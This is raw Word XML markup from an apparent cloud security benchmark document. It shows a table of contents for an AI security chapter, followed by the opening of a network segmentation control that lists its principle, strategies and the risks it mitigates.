            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449580" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Artificial Intelligence Security</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449580 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>217</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1A91341E" w14:textId="37425222" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449581" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>AI Platform Security</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449581 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>217</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4F892A74" w14:textId="2249B3AA" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449582" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12.1.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>AI-1: Ensure use of approved models</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449582 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>217</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5C2E8FE3" w14:textId="076F9366" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449583" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>AI Application Security</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449583 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>219</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0152D8F3" w14:textId="00D4DE90" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449584" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12.2.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>AI-2: Implement multi-layered content filtering</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449584 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>219</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6259A1D1" w14:textId="7F9E3FA1" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449585" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12.2.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>AI-3: Adopt safety meta-prompts</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449585 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>221</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23A1A9F8" w14:textId="011C9F8F" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449586" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12.2.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>AI-4: Apply least privilege for agent functions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449586 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>223</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C024246" w14:textId="293F3B88" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449587" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12.2.4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>AI-5: Ensure human-in-the-loop</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449587 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>225</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4DB52D3A" w14:textId="78420589" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449588" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Monitor and Respond</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449588 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>227</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A94F3F2" w14:textId="5164C312" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449589" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12.3.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>AI-6: Establish monitoring and detection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449589 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>227</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F5F57A3" w14:textId="0846EA49" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449590" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12.3.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>AI-7: Perform continuous AI Red Teaming</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449590 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>230</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D39A97B" w14:textId="07B2086C"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Default="00B63114" w:rsidP="002C45CF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="480C7247" w14:textId="77777777" w:rsidR="0044267F" w:rsidRDefault="0044267F" w:rsidP="002C45CF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11308D04" w14:textId="77777777" w:rsidR="0044267F" w:rsidRPr="00E53977" w:rsidRDefault="0044267F"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42449463"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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42449464"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Apply network isolation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="2C090C89" w14:textId="4053DDE9" w:rsidR="00773C1C" w:rsidRDefault="00773C1C" w:rsidP="00575260">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc242449465"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>NS-1: Establish network segmentation boundaries</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="36601EFD" w14:textId="00510A2B" w:rsidR="0038671B" w:rsidRDefault="0038671B" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="338"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0038671B">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21778330" w14:textId="56BF60E1" w:rsidR="008A6111" w:rsidRPr="008A6111" w:rsidRDefault="008A6111" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="348"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="161616"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t>Network segmentation involves dividing a network into smaller, isolated segments to control and limit the flow of traffic between cloud resources to reduce blast radius.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F087E8" w14:textId="1C079E90" w:rsidR="008A6111" w:rsidRPr="008A6111" w:rsidRDefault="008A6111" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="348"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="161616"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t>Design your network segmentation to ensure that your virtual network deployment aligns with your enterprise segmentation strategy and different risk levels. Common segmentation strategy includes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085F1CF7"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Corpnet with Application networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E6E262"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Application networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B879B5A" w14:textId="77777777" w:rsidR="008A6111" w:rsidRPr="008A6111" w:rsidRDefault="008A6111" w:rsidP="00DD2377">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="349"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2070"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Separate Production and Test Environment networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B20522" w14:textId="75204B34" w:rsidR="0038671B" w:rsidRDefault="0038671B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="338"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0038671B">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0038671B">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4B8C9027" w14:textId="46D5B02A" w:rsidR="0038671B" w:rsidRDefault="0038671B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0038671B">
        <w:t>Flat network exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A84C2E1" w14:textId="438FA8CC" w:rsidR="0038671B" w:rsidRDefault="0038671B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0038671B">
        <w:t>Privilege escalation pathways</w:t>
      </w:r>
